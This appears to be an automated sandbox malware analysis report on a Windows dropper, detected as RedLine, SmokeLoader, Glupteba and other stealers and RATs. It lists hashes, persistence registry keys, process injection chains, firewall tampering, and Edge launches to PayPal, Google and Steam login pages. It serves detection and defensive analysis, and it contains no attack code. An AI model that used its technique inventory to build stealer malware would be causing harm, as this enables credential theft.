Malware Analysis Report

2025-01-02 05:02

Sample ID 231111-lxqfkach7v
Target 2a514d14cf0c18516696437e608ab3e2.exe
SHA256 bf747d7d7e3824b80a05d2988b5163729fb1b8c280f4ea5e2d638ab421f5c9d4
Tags
glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor paypal dropper evasion infostealer loader persistence phishing rat spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

bf747d7d7e3824b80a05d2988b5163729fb1b8c280f4ea5e2d638ab421f5c9d4

Threat Level: Known bad

The file 2a514d14cf0c18516696437e608ab3e2.exe was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor paypal dropper evasion infostealer loader persistence phishing rat spyware stealer trojan

SectopRAT payload

Mystic

RedLine payload

SectopRAT

Glupteba

Detect ZGRat V1

RedLine

SmokeLoader

Detect Mystic stealer payload

Glupteba payload

ZGRat

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

AutoIT Executable

Detected potential entity reuse from brand paypal.

Launches sc.exe

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 09:54

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 09:54

Reported

2023-11-11 09:57

Platform

win10v2004-20231023-en

Max time kernel

82s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe"

Signatures

Detect Mystic stealer payload


Detect ZGRat V1


Glupteba

loader dropper glupteba

Glupteba payload


Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload


SectopRAT

trojan rat sectoprat

SectopRAT payload


SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\392.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\D50E.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe N/A

AutoIT Executable


Detected potential entity reuse from brand paypal.

phishing paypal

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D667.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6C0.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\970.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 760 wrote to memory of 4704 N/A C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe
PID 4704 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe
PID 452 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe
PID 2980 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe
PID 4972 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2104 wrote to memory of 2664 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2312 wrote to memory of 880 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 2020 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4476 wrote to memory of 2740 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 956 wrote to memory of 4872 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2516 wrote to memory of 704 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4972 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe

"C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x160,0x170,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12817497746540180914,17803094425432372633,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,15683247929074773971,137571882435910043,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,15683247929074773971,137571882435910043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,2184513226323836926,18337166209451837570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,2184513226323836926,18337166209451837570,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,12817497746540180914,17803094425432372633,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,6612052458489063345,8070063193370144605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,10912680623660141788,673443190448807748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,10887465860726572600,513329467361060850,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

